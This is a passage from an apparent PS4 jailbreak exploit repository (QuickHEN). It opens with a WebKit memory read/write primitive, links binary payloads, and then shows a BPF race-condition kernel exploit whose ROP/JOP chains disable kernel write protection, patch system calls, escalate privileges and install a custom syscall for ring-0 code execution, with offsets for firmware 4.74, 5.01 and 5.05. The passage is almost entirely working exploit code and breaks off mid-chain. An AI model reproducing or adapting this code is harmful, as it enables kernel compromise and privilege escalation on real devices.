242 | butterfly.low += 0x10;
243 | 
244 | tgt.c = leakval_u32;
245 | var lkv_u32_old = new int64(hax[4], hax[5]);
246 | hax[4] = butterfly.low;
247 | hax[5] = butterfly.hi;
248 | // Setup read/write primitive
249 | 
250 | tgt.c = master;
251 | hax[4] = leakval_u32[0];
252 | hax[5] = leakval_u32[1];
253 | 
254 | var addr_to_slavebuf = new int64(master[4], master[5]);
255 | tgt.c = leakval_u32;
256 | hax[4] = lkv_u32_old.low;
257 | hax[5] = lkv_u32_old.hi;
258 | 
259 | tgt.c = 0;
260 | hax = 0;
261 | 
262 | var prim = {
263 |     write8: function (addr, val) {
264 |         master[4] = addr.low;
265 |         master[5] = addr.hi;
266 | 
267 |         if (val instanceof int64) {
268 |             slave[0] = val.low;
269 |             slave[1] = val.hi;
270 |         } else {
271 |             slave[0] = val;
272 |             slave[1] = 0;
273 |         }
274 | 
275 |         master[4] = addr_to_slavebuf.low;
276 |         master[5] = addr_to_slavebuf.hi;
277 |     },
278 | 
279 |     write4: function (addr, val) {
280 |         master[4] = addr.low;
281 |         master[5] = addr.hi;
282 | 
283 |         slave[0] = val;
284 | 
285 |         master[4] = addr_to_slavebuf.low;
286 |         master[5] = addr_to_slavebuf.hi;
287 |     },
288 | 
289 |     read8: function (addr) {
290 |         master[4] = addr.low;
291 |         master[5] = addr.hi;
292 | 
293 |         var rtv = new int64(slave[0], slave[1]);
294 | 
295 |         master[4] = addr_to_slavebuf.low;
296 |         master[5] = addr_to_slavebuf.hi;
297 | 
298 |         return rtv;
299 |     },
300 | 
301 |     read4: function (addr) {
302 |         master[4] = addr.low;
303 |         master[5] = addr.hi;
304 | 
305 |         var rtv = slave[0];
306 | 
307 |         master[4] = addr_to_slavebuf.low;
308 |         master[5] = addr_to_slavebuf.hi;
309 | 
310 |         return rtv;
311 |     },
312 | 
313 |     leakval: function (jsval) {
314 |         leakval_helper[0] = jsval;
315 |         var rtv = this.read8(butterfly);
316 |         this.write8(butterfly, new int64(0x41414141, 0xffff0000));
317 | 
318 |         return rtv;
319 |     },
320 | 
321 |     createval: function (jsval) {
322 |         this.write8(butterfly, jsval);
323 |         var rt = leakval_helper[0];
324 |         this.write8(butterfly, new int64(0x41414141, 0xffff0000));
325 |         return rt;
326 |     }
327 | };
328 | 
329 | window.primitives = prim;
330 | if (window.postExpl) window.postExpl();
331 | 


--------------------------------------------------------------------------------
/QuickHEN/fake_installer.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TeamFAPS/PS4-Exploits/eaee94c568130de1b866c4b55811acf7219974f5/QuickHEN/fake_installer.bin


--------------------------------------------------------------------------------
/QuickHEN/index.html:
--------------------------------------------------------------------------------
  4 | QuickHEN 4.55-5.07


--------------------------------------------------------------------------------
/QuickHEN/kdumper.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TeamFAPS/PS4-Exploits/eaee94c568130de1b866c4b55811acf7219974f5/QuickHEN/kdumper.bin


--------------------------------------------------------------------------------
/QuickHEN/kernel.js:
--------------------------------------------------------------------------------
  1 | function kernExploit() {
  2 | 	try {
  3 | 		var fd = p.syscall("sys_open", p.stringify("/dev/bpf0"), 2).low;
  4 | 		if (fd == (-1 >>> 0))
  5 | 			throw "Failed to open first bpf device!"
  6 | 		var fd1 = p.syscall("sys_open", p.stringify("/dev/bpf0"), 2).low;
  7 | 		
  8 | 		// Write BPF programs
  9 | 		var bpf_valid = p.malloc32(0x4000);
 10 | 		var bpf_spray = p.malloc32(0x4000);
 11 | 		var bpf_valid_u32 = bpf_valid.backing;
 12 | 		
 13 | 		var bpf_valid_prog = p.malloc(0x40);
 14 | 		p.write8(bpf_valid_prog, 0x800 / 8)
 15 | 		p.write8(bpf_valid_prog.add32(8), bpf_valid)
 16 | 		
 17 | 		var bpf_spray_prog = p.malloc(0x40);
 18 | 		p.write8(bpf_spray_prog, 0x800 / 8)
 19 | 		p.write8(bpf_spray_prog.add32(8), bpf_spray)
 20 | 		
 21 | 		for (var i = 0; i < 0x400;) {
 22 | 			bpf_valid_u32[i++] = 6;
 23 | 			bpf_valid_u32[i++] = 0;
 24 | 		}
 25 | 		
 26 | 		var rtv = p.syscall("sys_ioctl", fd, 0x8010427B, bpf_valid_prog);
 27 | 		if (rtv.low != 0)
 28 | 			throw "Failed to open first bpf device!";
 29 | 		
 30 | 		// Spawn thread
 31 | 		var spawnthread = function (name, chain) {
 32 | 			var contextp = p.malloc32(0x2000);
 33 | 			var contextz = contextp.backing;
 34 | 			contextz[0] = 1337;
 35 | 			var thread2 = new rop();
 36 | 			thread2.push(window.gadgets["ret"]);
 37 | 			thread2.push(window.gadgets["ret"]);
 38 | 			thread2.push(window.gadgets["ret"]);
 39 | 			thread2.push(window.gadgets["ret"]);
 40 | 			chain(thread2);
 41 | 			p.write8(contextp, window.gadgets["ret"]);
 42 | 			p.write8(contextp.add32(0x10), thread2.stackBase);
 43 | 			p.syscall(324, 1);
 44 | 			var retv = function () { p.fcall(window.gadgets["createThread"], window.gadgets["longjmp"], contextp, p.stringify(name)); }
 45 | 			window.nogc.push(contextp);
 46 | 			window.nogc.push(thread2);
 47 | 			return retv;
 48 | 		}
 49 | 		
 50 | 		var interrupt1, loop1;
 51 | 		var interrupt2, loop2;
 52 | 		var sock = p.syscall(97, 2, 2);
 53 | 		
 54 | 		// Racing thread
 55 | 		var start1 = spawnthread("GottaGoFast", function (thread2) {
 56 | 			interrupt1 = thread2.stackBase;
 57 | 			thread2.push(window.gadgets["ret"]);
 58 | 			thread2.push(window.gadgets["ret"]);
 59 | 			thread2.push(window.gadgets["ret"]);
 60 | 			
 61 | 			thread2.push(window.gadgets["pop rdi"]);
 62 | 			thread2.push(fd);
 63 | 			thread2.push(window.gadgets["pop rsi"]);
 64 | 			thread2.push(0x8010427B);
 65 | 			thread2.push(window.gadgets["pop rdx"]);
 66 | 			thread2.push(bpf_valid_prog);
 67 | 			thread2.push(window.gadgets["pop rsp"]);
 68 | 			thread2.push(thread2.stackBase.add32(0x800));
 69 | 			thread2.count = 0x100;
 70 | 			var cntr = thread2.count;
 71 | 			thread2.push(window.syscalls[54]); // ioctl
 72 | 			thread2.push_write8(thread2.stackBase.add32(cntr * 8), window.syscalls[54]); // restore ioctl
 73 | 			
 74 | 			thread2.push(window.gadgets["pop rdi"]);
 75 | 			var wherep = thread2.pushSymbolic();
 76 | 			thread2.push(window.gadgets["pop rsi"]);
 77 | 			var whatp = thread2.pushSymbolic();
 78 | 			thread2.push(window.gadgets["mov [rdi], rsi"]);
 79 | 			
 80 | 			thread2.push(window.gadgets["pop rsp"]);
 81 | 			
 82 | 			loop1 = thread2.stackBase.add32(thread2.count * 8);
 83 | 			thread2.push(0x41414141);
 84 | 			
 85 | 			thread2.finalizeSymbolic(wherep, loop1);
 86 | 			thread2.finalizeSymbolic(whatp, loop1.sub32(8));
 87 | 		});
 88 | 		
 89 | 		// start setting up chains
 90 | 		var krop = new rop();
 91 | 		
 92 | 		var kscratch = p.malloc32(0x1000);
 93 | 		var ctxp  = p.malloc32(0x1000);
 94 | 		var ctxp1 = p.malloc32(0x1000);
 95 | 		var ctxp2 = p.malloc32(0x1000);
 96 | 		
 97 | 		
 98 | 		// Helper function for patching kernel
 99 | 		var kpatch = function(offset, qword) {
100 | 			krop.push(window.gadgets["pop rax"]);
101 | 			krop.push(kscratch);
102 | 			krop.push(window.gadgets["mov rax, [rax]"]);
103 | 			krop.push(window.gadgets["pop rsi"]);
104 | 			krop.push(offset);
105 | 			krop.push(window.gadgets["add rax, rsi"]);
106 | 			krop.push(window.gadgets["pop rsi"]);
107 | 			krop.push(qword);
108 | 			krop.push(window.gadgets["mov [rax], rsi"]);
109 | 		}
110 | 		
111 | 		// Helper function for patching kernel with information from kernel.text
112 | 		var kpatch2 = function(offset, offset2) {
113 | 			krop.push(window.gadgets["pop rax"]);
114 | 			krop.push(kscratch);
115 | 			krop.push(window.gadgets["mov rax, [rax]"]);
116 | 			krop.push(window.gadgets["pop rsi"]);
117 | 			krop.push(offset);
118 | 			krop.push(window.gadgets["add rax, rsi"]);
119 | 			krop.push(window.gadgets["mov rdi, rax"]);
120 | 			krop.push(window.gadgets["pop rax"]);
121 | 			krop.push(kscratch);
122 | 			krop.push(window.gadgets["mov rax, [rax]"]);
123 | 			krop.push(window.gadgets["pop rsi"]);
124 | 			krop.push(offset2);
125 | 			krop.push(window.gadgets["add rax, rsi"]);
126 | 			krop.push(window.gadgets["mov [rdi], rax"]);
127 | 		}
128 | 		
129 | 		var stackshift_from_retaddr = 0;
130 | 		
131 | 		p.write8(bpf_spray.add32(0x10), ctxp);     // Spray heap with the fake knote object
132 | 		p.write8(ctxp.add32(0x50), 0);             // Set knote->kn_status to 0 to detach
133 | 		p.write8(ctxp.add32(0x68), ctxp1); // Set knote->kn_fops to fake function table
134 | 		
135 | 		p.write8(ctxp1.add32(0x10), window.gadgets["jop1"]);  // Set kn_fops->f_detach to first JOP gadget
136 | 		stackshift_from_retaddr += 0x8 + window.gadgets_shift["stackshift_jop1"];
137 | 		
138 | 		p.write8(ctxp.add32(0x00), ctxp2);  // Set rdi
139 | 		p.write8(ctxp.add32(0x10), ctxp2.add32(0x08));
140 | 		p.write8(ctxp2.add32(0x7D0), window.gadgets["jop2"]); // Chain to next gadget
141 | 		
142 | 		var iterbase = ctxp2;
143 | 		
144 | 		for (var i = 0; i < 0xF; i++) {
145 | 			p.write8(iterbase, window.gadgets["jop1"]); // Chain to next gadget
146 | 			stackshift_from_retaddr += 0x8 + window.gadgets_shift["stackshift_jop1"];
147 | 			
148 | 			p.write8(iterbase.add32(0x7D0 + 0x20), window.gadgets["jop2"]); // Chain to next gadget
149 | 			
150 | 			p.write8(iterbase.add32(0x08), iterbase.add32(0x20));
151 | 			p.write8(iterbase.add32(0x18), iterbase.add32(0x28));
152 | 			iterbase = iterbase.add32(0x20);
153 | 		}
154 | 		
155 | 		var raxbase = iterbase;
156 | 		var rdibase = iterbase.add32(0x08);
157 | 		var memcpy = get_jmptgt(webKitBase.add32(0xF8));
158 | 		memcpy = p.read8(memcpy);
159 | 		
160 | 		p.write8(raxbase, window.gadgets["jop3"]); // Chain to next gadget
161 | 		stackshift_from_retaddr += 0x8;
162 | 		
163 | 		p.write8(rdibase.add32(0x70), window.gadgets["jop4"]); // Chain to next gadget
164 | 		stackshift_from_retaddr += 0x8;
165 | 		
166 | 		p.write8(rdibase.add32(0x18), rdibase);
167 | 		p.write8(rdibase.add32(0x08), krop.stackBase); // Sets RSI to krop stack's location
168 | 		p.write8(raxbase.add32(0x30), window.gadgets["jop_mov rbp, rsp"]); // Save RSP
169 | 		
170 | 		p.write8(rdibase, raxbase); // [rdi] = rax
171 | 		p.write8(raxbase.add32(0x420), window.gadgets["jop6"]); // Chain to next gadget
172 | 		stackshift_from_retaddr += window.gadgets_shift["stackshift_jop6"];
173 | 		
174 | 		var topofchain = stackshift_from_retaddr;
175 | 		p.write8(raxbase.add32(0x40), memcpy.add32(0x32)); // Chain to memcpy
176 | 		p.write8(rdibase.add32(0xB0), topofchain); // Write size for memcpy
177 | 		
178 | 		for (var i = 0; i < 0x1000 / 8; i++)
179 | 			p.write8(krop.stackBase.add32(i * 8), window.gadgets["ret"]);
180 | 		
181 | 		krop.count = 0x10;
182 | 		
183 | 		p.write8(kscratch.add32(0x420), window.gadgets["pop rdi"]);
184 | 		p.write8(kscratch.add32(0x40), window.gadgets["pop rax"]);
185 | 		p.write8(kscratch.add32(0x18), kscratch);
186 | 		
187 | 		//krop.push(window.gadgets["infloop"]); // only for kexploit debug test
188 | 		
189 | 		krop.push(window.gadgets["pop rdi"]);
190 | 		krop.push(kscratch.add32(0x18));
191 | 		krop.push(window.gadgets["jop_mov rbp, rsp"]);
192 | 		
193 | 		var rboff = topofchain - krop.count * 8;
194 | 		
195 | 		krop.push(window.gadgets["jop6"]); // lea rdi, [rbp - 0x28]
196 | 		rboff += window.gadgets_shift["stackshift_jop6"];
197 | 		krop.push(window.gadgets["pop rax"]);
198 | 		krop.push(rboff);
199 | 		krop.push(window.gadgets["add rdi, rax"]);
200 | 		
201 | 		if (fwFromUA == "5.01") {
202 | 			krop.push(window.gadgets["mov rax, [rdi]"]);
203 | 			krop.push(window.gadgets["pop rsi"]);
204 | 			krop.push(0x2FA); // 5.01-5.05
205 | 			krop.push(window.gadgets["add rax, rsi"]);
206 | 			krop.push(window.gadgets["mov [rdi], rax"]);
207 | 			
208 | 			// Save context of cr0 register
209 | 			krop.push(window.gadgets["pop rdi"]); // save address in usermode
210 | 			krop.push(kscratch);
211 | 			krop.push(window.gadgets["mov [rdi], rax"]);
212 | 			krop.push(window.gadgets["pop rsi"]);
213 | 			krop.push(0xC54B4); // 5.01-5.05
214 | 			krop.push(window.gadgets["add rax, rsi"]);
215 | 			krop.push(window.gadgets["pop rdi"]);
216 | 			krop.push(kscratch.add32(0x08));
217 | 			krop.push(window.gadgets["mov [rdi], rax"]);
218 | 			krop.push(window.gadgets["jmp rax"]);
219 | 			krop.push(window.gadgets["pop rdi"]); // save cr0
220 | 			krop.push(kscratch.add32(0x10));
221 | 			
222 | 			// Disable kernel write protection for .text
223 | 			krop.push(window.gadgets["mov [rdi], rax"]); // Save cr0 register
224 | 			krop.push(window.gadgets["pop rsi"]);
225 | 			krop.push(new int64(0xFFFEFFFF, 0xFFFFFFFF)); // Flip WP bit
226 | 			krop.push(window.gadgets["and rax, rsi"]);
227 | 			krop.push(window.gadgets["mov rdx, rax"]);
228 | 			krop.push(window.gadgets["pop rax"]);
229 | 			krop.push(kscratch.add32(8));
230 | 			krop.push(window.gadgets["mov rax, [rax]"]);
231 | 			krop.push(window.gadgets["pop rsi"]);
232 | 			krop.push(0x9);
233 | 			krop.push(window.gadgets["add rax, rsi"]);
234 | 			krop.push(window.gadgets["mov rdi, rax"]);
235 | 			krop.push(window.gadgets["mov rax, rdx"]);
236 | 			krop.push(window.gadgets["jmp rdi"]);
237 | 			
238 | 			krop.push(window.gadgets["pop rax"]);
239 | 			krop.push(kscratch);
240 | 			krop.push(window.gadgets["mov rax, [rax]"]);
241 | 			krop.push(window.gadgets["pop rsi"]);
242 | 			krop.push(0x3609A); // 5.01-5.05
243 | 			krop.push(window.gadgets["add rax, rsi"]);
244 | 			krop.push(window.gadgets["mov rax, [rax]"]);
245 | 			krop.push(window.gadgets["pop rdi"]);
246 | 			krop.push(kscratch.add32(0x330));
247 | 			krop.push(window.gadgets["mov [rdi], rax"]);
248 | 			
249 | 			// Patch sys_mprotect: Allow RWX mapping
250 | 			patch_mprotect = new int64(0x9090FA38, 0x90909090); // 5.01-5.05
251 | 			kpatch(0x3609A, patch_mprotect); // 5.01-5.05
252 | 			
253 | 			// Patch sys_setuid: add kexploit check so we don't run kexploit more than once (also doubles as privilege escalation)
254 | 			var patch_sys_setuid_offset = new int64(0xFFEE7016, 0xFFFFFFFF); // 5.01
255 | 			var patch_sys_setuid = new int64(0x000000B8, 0xC4894100); // 5.01-5.05
256 | 			kpatch(patch_sys_setuid_offset, patch_sys_setuid);
257 | 			
258 | 			// Patch amd64_syscall: syscall instruction allowed anywhere
259 | 			var patch_amd64_syscall_offset1 = new int64(0xFFE92A37, 0xFFFFFFFF); // 5.01
260 | 			var patch_amd64_syscall_offset2 = new int64(0xFFE92A55, 0xFFFFFFFF); // 5.01
261 | 			var patch_amd64_syscall_1 = new int64(0x00000000, 0x40878B49); // 5.01-5.05
262 | 			var patch_amd64_syscall_2 = new int64(0x90907DEB, 0x72909090); // 5.01-5.05
263 | 			kpatch(patch_amd64_syscall_offset1, patch_amd64_syscall_1);
264 | 			kpatch(patch_amd64_syscall_offset2, patch_amd64_syscall_2);
265 | 			
266 | 			// Patch: sys_mmap: allow RWX mapping from anywhere
267 | 			var patch_sys_mmap_offset = new int64(0xFFFCFAB4, 0xFFFFFFFF); // 5.01-5.05
268 | 			var patch_sys_mmap = new int64(0x37B64037, 0x3145C031); // 5.01-5.05
269 | 			kpatch(patch_sys_mmap_offset, patch_sys_mmap);
270 | 			
271 | 			// Patch sys_dynlib_dlsym: allow dynamic resolving from anywhere
272 | 			var patch_sys_dynlib_dlsym_1 = new int64(0x000000E9, 0x8B489000); // 5.01-5.05
273 | 			var patch_sys_dynlib_dlsym_2 = new int64(0x90C3C031, 0x90909090); // 5.01-5.05
274 | 			kpatch(0xCA3CE,  patch_sys_dynlib_dlsym_1); // 5.01-5.05
275 | 			kpatch(0x1448F4, patch_sys_dynlib_dlsym_2); // 5.01
276 | 			
277 | 			// Patch sysent entry #11: sys_kexec() custom syscall to execute code in ring0
278 | 			var patch_sys_exec_1 = new int64(0x00F0EDC4, 0); // 5.01
279 | 			var patch_sys_exec_2A = new int64(0x00F0EDCC, 0); // 5.01
280 | 			var patch_sys_exec_2B = new int64(0xFFEA5A04, 0xFFFFFFFF); // 5.01
281 | 			var patch_sys_exec_3 = new int64(0x00F0EDEC, 0); // 5.01
282 | 			var patch_sys_exec_param1 = new int64(0x02, 0);
283 | 			var patch_sys_exec_param3 = new int64(0, 1);
284 | 			kpatch(patch_sys_exec_1, patch_sys_exec_param1);
285 | 			kpatch2(patch_sys_exec_2A, patch_sys_exec_2B);
286 | 			kpatch(patch_sys_exec_3, patch_sys_exec_param3);
287 | 			
288 | 			// Enable kernel write protection for .text
289 | 			krop.push(window.gadgets["pop rax"]);
290 | 			krop.push(kscratch.add32(0x08));
291 | 			krop.push(window.gadgets["mov rax, [rax]"]);
292 | 			krop.push(window.gadgets["pop rsi"]);
293 | 			krop.push(0x09);
294 | 			krop.push(window.gadgets["add rax, rsi"]);
295 | 			krop.push(window.gadgets["mov rdi, rax"]);
296 | 			krop.push(window.gadgets["pop rax"]);
297 | 			krop.push(kscratch.add32(0x10)); // Restore old cr0 value with WP bit set
298 | 			krop.push(window.gadgets["mov rax, [rax]"]);
299 | 			krop.push(window.gadgets["jmp rdi"]);
300 | 			
301 | 		} else if (fwFromUA == "5.05") {
302 | 			krop.push(window.gadgets["mov rax, [rdi]"]);
303 | 			krop.push(window.gadgets["pop rsi"]);
304 | 			krop.push(0x2FA);
305 | 			krop.push(window.gadgets["add rax, rsi"]);
306 | 			krop.push(window.gadgets["mov [rdi], rax"]);
307 | 			
308 | 			// Save context of cr0 register
309 | 			krop.push(window.gadgets["pop rdi"]); // save address in usermode
310 | 			krop.push(kscratch);
311 | 			krop.push(window.gadgets["mov [rdi], rax"]);
312 | 			krop.push(window.gadgets["pop rsi"]);
313 | 			krop.push(0xC54B4);
314 | 			krop.push(window.gadgets["add rax, rsi"]);
315 | 			krop.push(window.gadgets["pop rdi"]);
316 | 			krop.push(kscratch.add32(0x08));
317 | 			krop.push(window.gadgets["mov [rdi], rax"]);
318 | 			krop.push(window.gadgets["jmp rax"]);
319 | 			krop.push(window.gadgets["pop rdi"]); // save cr0
320 | 			krop.push(kscratch.add32(0x10));
321 | 			
322 | 			// Disable kernel write protection for .text
323 | 			krop.push(window.gadgets["mov [rdi], rax"]); // Save cr0 register
324 | 			krop.push(window.gadgets["pop rsi"]);
325 | 			krop.push(new int64(0xFFFEFFFF, 0xFFFFFFFF)); // Flip WP bit
326 | 			krop.push(window.gadgets["and rax, rsi"]);
327 | 			krop.push(window.gadgets["mov rdx, rax"]);
328 | 			krop.push(window.gadgets["pop rax"]);
329 | 			krop.push(kscratch.add32(8));
330 | 			krop.push(window.gadgets["mov rax, [rax]"]);
331 | 			krop.push(window.gadgets["pop rsi"]);
332 | 			krop.push(0x9);
333 | 			krop.push(window.gadgets["add rax, rsi"]);
334 | 			krop.push(window.gadgets["mov rdi, rax"]);
335 | 			krop.push(window.gadgets["mov rax, rdx"]);
336 | 			krop.push(window.gadgets["jmp rdi"]);
337 | 			
338 | 			krop.push(window.gadgets["pop rax"]);
339 | 			krop.push(kscratch);
340 | 			krop.push(window.gadgets["mov rax, [rax]"]);
341 | 			krop.push(window.gadgets["pop rsi"]);
342 | 			krop.push(0x3609A);
343 | 			krop.push(window.gadgets["add rax, rsi"]);
344 | 			krop.push(window.gadgets["mov rax, [rax]"]);
345 | 			krop.push(window.gadgets["pop rdi"]);
346 | 			krop.push(kscratch.add32(0x330));
347 | 			krop.push(window.gadgets["mov [rdi], rax"]);
348 | 			
349 | 			// Patch sys_mprotect: Allow RWX mapping
350 | 			patch_mprotect = new int64(0x9090FA38, 0x90909090);
351 | 			kpatch(0x3609A, patch_mprotect);
352 | 			
353 | 			// Patch sys_setuid: add kexploit check so we don't run kexploit more than once (also doubles as privilege escalation)
354 | 			var patch_sys_setuid_offset = new int64(0xFFEE6F06, 0xFFFFFFFF);
355 | 			var patch_sys_setuid = new int64(0x000000B8, 0xC4894100);
356 | 			kpatch(patch_sys_setuid_offset, patch_sys_setuid);
357 | 			
358 | 			// Patch amd64_syscall: syscall instruction allowed anywhere
359 | 			var patch_amd64_syscall_offset1 = new int64(0xFFE92927, 0xFFFFFFFF);
360 | 			var patch_amd64_syscall_offset2 = new int64(0xFFE92945, 0xFFFFFFFF);
361 | 			var patch_amd64_syscall_1 = new int64(0x00000000, 0x40878B49);
362 | 			var patch_amd64_syscall_2 = new int64(0x90907DEB, 0x72909090);
363 | 			kpatch(patch_amd64_syscall_offset1, patch_amd64_syscall_1);
364 | 			kpatch(patch_amd64_syscall_offset2, patch_amd64_syscall_2);
365 | 			
366 | 			// Patch: sys_mmap: allow RWX mapping from anywhere
367 | 			var patch_sys_mmap_offset = new int64(0xFFFCFAB4, 0xFFFFFFFF);
368 | 			var patch_sys_mmap = new int64(0x37B64037, 0x3145C031);
369 | 			kpatch(patch_sys_mmap_offset, patch_sys_mmap);
370 | 			
371 | 			// Patch sys_dynlib_dlsym: allow dynamic resolving from anywhere
372 | 			var patch_sys_dynlib_dlsym_1 = new int64(0x0001C1E9, 0x8B489000);
373 | 			var patch_sys_dynlib_dlsym_2 = new int64(0x90C3C031, 0x90909090);
374 | 			kpatch(0xCA3CE,  patch_sys_dynlib_dlsym_1);
375 | 			kpatch(0x144AB4, patch_sys_dynlib_dlsym_2);
376 | 			
377 | 			// Patch sysent entry #11: sys_kexec() custom syscall to execute code in ring0
378 | 			var patch_sys_exec_1 = new int64(0x00F0ECB4, 0);
379 | 			var patch_sys_exec_2A = new int64(0x00F0ECBC, 0);
380 | 			var patch_sys_exec_2B = new int64(0xFFEA58F4, 0xFFFFFFFF);
381 | 			var patch_sys_exec_3 = new int64(0x00F0ECDC, 0);
382 | 			var patch_sys_exec_param1 = new int64(0x02, 0);
383 | 			var patch_sys_exec_param3 = new int64(0, 1);
384 | 			kpatch(patch_sys_exec_1, patch_sys_exec_param1);
385 | 			kpatch2(patch_sys_exec_2A, patch_sys_exec_2B);
386 | 			kpatch(patch_sys_exec_3, patch_sys_exec_param3);
387 | 			
388 | 			// Enable kernel write protection for .text
389 | 			krop.push(window.gadgets["pop rax"]);
390 | 			krop.push(kscratch.add32(0x08));
391 | 			krop.push(window.gadgets["mov rax, [rax]"]);
392 | 			krop.push(window.gadgets["pop rsi"]);
393 | 			krop.push(0x09);
394 | 			krop.push(window.gadgets["add rax, rsi"]);
395 | 			krop.push(window.gadgets["mov rdi, rax"]);
396 | 			krop.push(window.gadgets["pop rax"]);
397 | 			krop.push(kscratch.add32(0x10)); // Restore old cr0 value with WP bit set
398 | 			krop.push(window.gadgets["mov rax, [rax]"]);
399 | 			krop.push(window.gadgets["jmp rdi"]);
400 | 			
401 | 		} else if (fwFromUA == "4.74") {
402 | 			
403 | 			krop.push(window.gadgets["mov rax, [rdi]"]);
404 | 			krop.push(window.gadgets["pop rcx"]);
405 | 			krop.push(0x1E48A0); // Slide of the return ptr from kernel base
406 | 			krop.push(window.gadgets["sub rax, rcx"]);
407 | 			krop.push(window.gadgets["mov rdx, rax"]);
408 | 			krop.push(window.gadgets["pop rsi"]);
409 | 			krop.push(kscratch.add32(0x90));
410 | 			krop.push(window.gadgets["mov [rsi], rdx"]);
411 | 			
412 | 			
413 | 			krop.push(window.gadgets["pop rax"]);
414 | 			krop.push(window.gadgets["test"]);
415 | 			krop.push(window.gadgets["mov [rdi], rax"]);
416 | 			
417 | 			
418 | 			
419 | 			// Disable kernel write protection
420 | 			krop.push(window.gadgets["pop rax"])
421 | 			krop.push(kscratch.add32(0x90));
422 | 			krop.push(window.gadgets["mov rax, [rax]"]);
423 | 			krop.push(window.gadgets["pop rcx"]);
424 | 			krop.push(0x283129);
425 | 			krop.push(window.gadgets["add rax, rcx"]);
426 | 			krop.push(window.gadgets["mov rdx, rax"]);
427 | 			krop.push(window.gadgets["pop rax"]);
428 | 			krop.push(0x80040033);
429 | 			krop.push(window.gadgets["jmp rdx_more"]);
430 | 			
431 | 			// Add kexploit check so we don't run kexploit more than once (also doubles as privilege escalation)
432 | 			// E8 C8 37 13 00 41 89 C6 -> B8 00 00 00 00 41 89 C6
433 | 			var kexploit_check_patch = new int64(0x000000B8, 0xC6894100);
434 | 			krop.push(window.gadgets["pop rax"])
435 | 			krop.push(kscratch.add32(0x90));
436 | 			krop.push(window.gadgets["mov rax, [rax]"]);
437 | 			krop.push(window.gadgets["pop rcx"]);
438 | 			krop.push(0x113B73);
439 | 			krop.push(window.gadgets["add rax, rcx"]);
440 | 			krop.push(window.gadgets["pop rsi"]);
441 | 			krop.push(kexploit_check_patch);
442 | 			krop.push(window.gadgets["mov [rax], rsi"]);
443 | 			
444 | 			// Patch mprotect: Allow RWX (read-write-execute) mapping
445 | 			var mprotect_patch = new int64(0x9090EA38, 0x90909090);
446 | 			krop.push(window.gadgets["pop rax"])
447 | 			krop.push(kscratch.add32(0x90));
448 | 			krop.push(window.gadgets["mov rax, [rax]"]);
449 | 			krop.push(window.gadgets["pop rcx"]);
450 | 			krop.push(0x397876);
451 | 			krop.push(window.gadgets["add rax, rcx"]);
452 | 			krop.push(window.gadgets["pop rsi"]);
453 | 			krop.push(mprotect_patch);
454 | 			krop.push(window.gadgets["mov [rax], rsi"]);
455 | 			
456 | 			// Patch sys_mmap: Allow RWX (read-write-execute) mapping
457 | 			var kernel_mmap_patch = new int64(0x37b64137, 0x3145c031);
458 | 			krop.push(window.gadgets["pop rax"])
459 | 			krop.push(kscratch.add32(0x90));
460 | 			krop.push(window.gadgets["mov rax, [rax]"]);
461 | 			krop.push(window.gadgets["pop rcx"]);
462 | 			krop.push(0x1413A4);
463 | 			krop.push(window.gadgets["add rax, rcx"]);
464 | 			krop.push(window.gadgets["pop rsi"]);
465 | 			krop.push(kernel_mmap_patch);
466 | 			krop.push(window.gadgets["mov [rax], rsi"]);
467 | 			
468 | 			// Patch syscall: syscall instruction allowed anywhere
469 | 			var kernel_syscall_patch1 = new int64(0x00000000, 0x40878b49);
470 | 			var kernel_syscall_patch2 = new int64(0x909079eb, 0x72909090);
471 | 			krop.push(window.gadgets["pop rax"])
472 | 			krop.push(kscratch.add32(0x90));
473 | 			krop.push(window.gadgets["mov rax, [rax]"]);
474 | 			krop.push(window.gadgets["pop rcx"]);
475 | 			krop.push(0x3DD4B3);
476 | 			krop.push(window.gadgets["add rax, rcx"]);
477 | 			krop.push(window.gadgets["pop rsi"]);
478 | 			krop.push(kernel_syscall_patch1);
479 | 			krop.push(window.gadgets["mov [rax], rsi"]);
480 | 			krop.push(window.gadgets["pop rax"])
481 | 			krop.push(kscratch.add32(0x90));
482 | 			krop.push(window.gadgets["mov rax, [rax]"]);
483 | 			krop.push(window.gadgets["pop rcx"]);
484 | 			krop.push(0x3DD4D1);
485 | 			krop.push(window.gadgets["add rax, rcx"]);
486 | 			krop.push(window.gadgets["pop rsi"]);
487 | 			krop.push(kernel_syscall_patch2);
488 | 			krop.push(window.gadgets["mov [rax], rsi"]);
489 | 			
490 | 			// Patch sys_dynlib_dlsym: Allow from anywhere
491 | 			var kernel_dlsym_patch1 = new int64(0x000352E9, 0x8B489000);
492 | 			var kernel_dlsym_patch2 = new int64(0x90C3C031, 0x90909090);
493 | 			krop.push(window.gadgets["pop rax"])
494 | 			krop.push(kscratch.add32(0x90));
495 | 			krop.push(window.gadgets["mov rax, [rax]"]);
496 | 			krop.push(window.gadgets["pop rcx"]);
497 | 			krop.push(0x3D05AE);
498 | 			krop.push(window.gadgets["add rax, rcx"]);
499 | 			krop.push(window.gadgets["pop rsi"]);
500 | 			krop.push(kernel_dlsym_patch1);
501 | 			krop.push(window.gadgets["mov [rax], rsi"]);
502 | 			krop.push(window.gadgets["pop rax"])
503 | 			krop.push(kscratch.add32(0x90));
504 | 			krop.push(window.gadgets["mov rax, [rax]"]);
505 | 			krop.push(window.gadgets["pop rcx"]);
506 | 			krop.push(0x686A0);
507 | 			krop.push(window.gadgets["add rax, rcx"]);
508 | 			krop.push(window.gadgets["pop rsi"]);
509 | 			krop.push(kernel_dlsym_patch2);
510 | 			krop.push(window.gadgets["mov [rax], rsi"]);
511 | 			
512 | 			// Add custom sys_exec() call to execute arbitrary code as kernel
513 | 			var kernel_exec_param = new int64(0, 1);
514 | 			krop.push(window.gadgets["pop rax"])
515 | 			krop.push(kscratch.add32(0x90));
516 | 			krop.push(window.gadgets["mov rax, [rax]"]);
517 | 			krop.push(window.gadgets["pop rcx"]);
518 | 			krop.push(0x10349A0);
519 | 			krop.push(window.gadgets["add rax, rcx"]);
520 | 			krop.push(window.gadgets["pop rsi"]);
521 | 			krop.push(0x02);
522 | 			krop.push(window.gadgets["mov [rax], rsi"]);
523 | 			krop.push(window.gadgets["pop rsi"])
524 | 			krop.push(0x139A2F); // jmp qword ptr [rsi],done
525 | 			krop.push(window.gadgets["pop rdi"])
526 | 			krop.push(kscratch.add32(0x90));
527 | 			krop.push(window.gadgets["add rsi, [rdi]; mov rax, rsi"]);
528 | 			krop.push(window.gadgets["pop rax"])
529 | 			krop.push(kscratch.add32(0x90));
